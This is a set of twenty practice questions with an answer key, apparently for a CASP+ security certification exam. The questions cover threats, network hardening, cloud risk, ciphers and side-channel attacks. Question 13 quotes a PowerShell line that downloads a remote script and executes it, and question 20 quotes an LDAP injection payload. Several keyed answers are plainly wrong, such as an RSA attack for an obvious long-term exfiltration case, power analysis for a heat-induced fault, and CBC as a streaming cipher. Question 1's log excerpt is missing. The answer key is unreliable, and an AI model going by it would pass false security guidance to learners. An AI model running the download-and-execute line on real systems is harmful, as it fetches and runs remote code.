1
Q
- A security analyst is validating the MAC policy on a set of Android devices. The policy was written to ensure non- critical applications are unable to access certain resources. When reviewing dmesg, the analyst notes many entries such as: Despite the deny message, this action was still permit
Which of the following is the MOST likely fix for this issue?
A. Add the objects of concern to the default context.
B. Set the devices to enforcing
C. Create separate domain and context files for irc.
D. Rebuild the policy, reinstall, and test.
A
B. Set the devices to enforcing
2
Q
- A technician is reviewing the logs and notices a large number of files were transferred to remote sites over the course of three months. This activity then stopped. The files were transferred via TLS-protected HTTP sessions from systems that do not send traffic to those sites. The technician will define this threat as:
A. a decrypting RSA using obsolete and weakened encryption attack
B. a zero-day attack
C. An advanced persistent threat
D. An on-path attack
A
A. a decrypting RSA using obsolete and weakened encryption attack
3
Q
- An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization’s headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application:
* Low latency for all mobile users to improve the user’s experience
* SSL offloading to improve web server performance
* Protection against DoS and DDoS attacks
* High availability
Which of the following should the organization implement to BEST ensure all requirements are met?
A. A cache server farm in its datacenter
B. A load-balanced group of reverse proxy servers with SSL acceleration
C. A CDN with the origin set to its datacenter
D. Dual gigabit-speed internet connections with managed DDoS prevention
A
C. A CDN with the origin set to its datacenter
4
Q
- A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The
system can only be managed through a web browser running Flash. The embedded system will be replaced within the year, but it is still critical at the moment.
Which of the following should the security administrator do to mitigate the risk?
A. Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement.
B. Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management
C. Suggest that the networking team contact the original embedded system’s vendor to get an update to the system that does not require Flash
D. Isolate the management interface to the private VLAN where a legacy browser in a VM can be used as needed to manage the system.
A
D. Isolate the management interface to the private VLAN where a legacy browser in a VM can be used as needed to manage the system.
5
Q
- A company’s product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company’s reputation in the market.
Which of the following should the company implement to address the risk of system unavailability?
A. User and entity behavior analytics
B. Redundant reporting systems
C. A self-healing system
D. Application controls
A
C. A self-healing system
6
Q
- A review of the past year’s attack patterns shows that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information.
Which of the following would be BEST for the company to implement?
A. A WAF
B. An IDS
C. A SIEM
D. A honeypot
A
D. A honeypot
7
Q
- A recent data breach stemmed from unauthorized access to an employee’s company account with a cloud-based productivity suite. The attacker exploited excessive permissions granted to a third-party OAuth application to collect sensitive information. Which of the following BEST mitigates inappropriate access and permissions issues?
A. SIEM
B. CASB
C. WAF
D. SOAR
A
B. CASB
8
Q
- A security engineer is hardening a company’s multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open:
*25
*110
*137
*138
*139
*445
Internal Windows clients are used to transferring files to the server to stage them for customer download as part of the company’s distribution process. Which of the following would be BEST solution to harden the systems?
A. Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface.
B. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface.
C. Close ports 22 and 139. Bind ports 137, 138 and 445 to only the internal interface.
D. Close ports 22, 137 and 139. Bind ports 110, and 445 to only the internal interface.
A
B. Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface.
9
Q
- A recent date breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes.
Which of the following should a security architect recommend?
A. A DLP program to identify which files have customer data and delete them
B. An ERP program to identify which processes need to be tracked
C. A CMDB to report on systems that are not configured to security baselines
D. A CRM application to consolidate the data and provision access based on the process and need
A
D. A CRM application to consolidate the data and provision access based on the process and need
10
Q
- Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?
A. Isolation control failure
B. Management plane breach
C. Insecure data deletion
D. Resource exhaustion
A
B. Management plane breach
11
Q
- Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:
A. When it is passed across a local network
B. In memory during processing
C. When it is written to a system’s solid-state drive
D. By an enterprise hardware security module
A
B. In memory during processing
12
Q
- A development team created a mobile application that contacts a company’s back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two)
A. Bot protection
B. OAuth 2.0
C. Input validation
D. Autoscaling endpoints
E. Rate limiting
F. CSRF protection
A
D. Autoscaling endpoints
E. Rate limiting
13
Q
- A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell “))(New-Object Net.WebClient).DownloadString (https://content.comptia.org/casp/whois.ps1);whois”
Which of the following security controls would have alerted and prevented the next phase of the attack?
A. Antivirus and UEBA
B. Reverse-proxy and sandbox
C. EDR and application approved list
D. Forward proxy and MFA
A
D. Forward proxy and MFA
14
Q
- A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system. Which of the following security responsibilities will the DevOps team need to perform?
A. Securely configure the authentication mechanisms
B. Patch the infrastructure at the operating system
C. Execute port scanning against the services
D. Upgrade the service as part of the life-cycle management
A
A. Securely configure the authentication mechanisms
15
Q
- A company’s Chief Information Officer wants to implement IDS software onto the current system’s architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide an analysis of malicious activities to determine the processes or users involved.
Which of the following would provide this information?
A. HIPS
B. UEBA
C. HIDS
D. NIDS
A
C. HIDS
16
Q
- The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation?
A. Software composition analysis
B. Code obfuscation
C. Static analysis
D. Dynamic analysis
A
D. Dynamic analysis
17
Q
- A software company is developing an application in which data must be encrypted with a cipher that requires the following:
*Initialization vector
*Low latency
*Suitable for streaming
Which of the following ciphers should the company use?
A. Cipher feedback
B. Cipher block chaining message authentication code
C. Cipher block chaining
D. Electronic codebook
A
C. Cipher block chaining
18
Q
- An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.
During the incident, when the self-healing system attempted to restart the services, available disk space on the drive to restart all the services was inadequate. The self-healing system did not detect that some of the services did not fully restart and declared the system as fully operational.
Which of the following BEST describes the reason why the silent failure occurred?
A. The system logs rotated prematurely
B. The disk utilization alarms are higher than what the service restarts require
C. The number of nodes in the self-healing cluster was healthy
D. Conditional checks prior to the service restart required.
A
B. The disk utilization alarms are higher than what the service restarts require
19
Q
- An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed.
Which of the following side-channel attacks did the team use?
A. Differential power analysis
B. Differential fault analysis
C. Differential temperature analysis
D. Differential timing analysis
A
A. Differential power analysis
20
Q
- A security analyst discovered that the company’s WAF was not properly configured. The main web server was breached. And the following payload was found in one of the malicious requests:
(&(objectClass=)(objectClass=))(&(objectClass=void)(type=admin)) Which of the following would BEST mitigate this vulnerability?
A. Network intrusion prevention
B. Data encoding
C. Input validation
D. CAPTCHA
A
C. Input validation
